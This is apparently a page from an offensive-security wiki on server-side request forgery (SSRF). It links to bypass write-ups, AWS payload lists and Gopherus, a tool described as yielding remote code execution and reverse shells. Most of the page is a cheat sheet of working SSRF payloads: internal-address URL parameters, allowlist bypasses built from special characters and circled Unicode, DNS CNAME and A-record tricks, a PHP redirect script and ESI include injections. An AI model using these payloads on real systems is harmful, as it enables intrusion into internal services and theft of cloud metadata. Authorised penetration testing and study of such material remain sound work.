SSRF

What is it?

Exploitation

Bypass SSRF Protection using Domain CNAME A Record: https://www.hahwul.com/2019/02/bypass-ssrf-protection-using-domain-cname-arecord.html

Bypass SSRF Protection using HTTP Redirect: https://www.hahwul.com/2019/02/bypass-ssrf-protection-using-http-redirect.html

Payloads

SSRF Payloads for AWS: https://github.com/cybercdh/hacks/blob/master/ssrf_payloads/aws

Tools

Gopherus: https://github.com/tarunkant/Gopherus

  • This tool will help you to generate Gopher payload for exploiting SSRF (Server Side Request Forgery) and gaining RCE (Remote Code Execution). And also it will help you to get the Reverse shell on the victim server.

Cheat Sheet

Basic Attack [ref1]

?url=http://localhost/server-status
?url=http://127.0.0.1/server-status
?url=http://internal_domain/page
?url=http://internal_ip(192.138.0.14)/page

Bypass SSRF with special char [ref1]

?url=http://allow_domain.internal_domain_or_ip/page
?url=http://allow_domain@internal_domain_or_ip/page
?url=http://internal_domain_or_ip#.allow_domain/page
?url=http://internal_domain_or_ip?.allow_domain/page
?url=http://internal_domain_or_ip\.allow_domain/page
?url=https://ⓦⓦⓦ.ⓗⓐⓗⓦⓤⓛ.ⓒⓞⓜ = www.hahwul.com

[ List ]
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

Bypass SSRF Domain CNAME & A-Record [ref1]

[ CNAME ]
http://localhost.hahwul.com/server-status

$ nslookup localhost.hahwul.com
localhost.hahwul.com    canonical name = localhost.
Name:    localhost
Address: 127.0.0.1


[ A-Record ]
http://127.hahwul.com/server-status

Bypass SSRF HTTP Redirect [ref1]

?url=http://your-domain/r.php

[ r.php ]
<?php
header('Location: http://127.0.0.1:8080/server-status');
?>

SSRF with ESIi [ref1]

<esi:include src=http://127.0.0.1/server-status/>
<esi:include src=http://internal_domain/server_base_csrf_page/>

Other Resources

Hahwul's SSRF cheatsheet: https://www.hahwul.com/p/ssrf-open-redirect-cheat-sheet.html?m=1

This script takes a domain name and a callback server, parses links , appends SSRF parameters and fire the requests. https://gist.github.com/hussein98d/d09b5990ff339dac8029b1e9248d2875

References

[ref1] : https://www.hahwul.com/p/ssrf-open-redirect-cheat-sheet.html?m=1

PreviousPath TraversalsNextSQL Injection

Last updated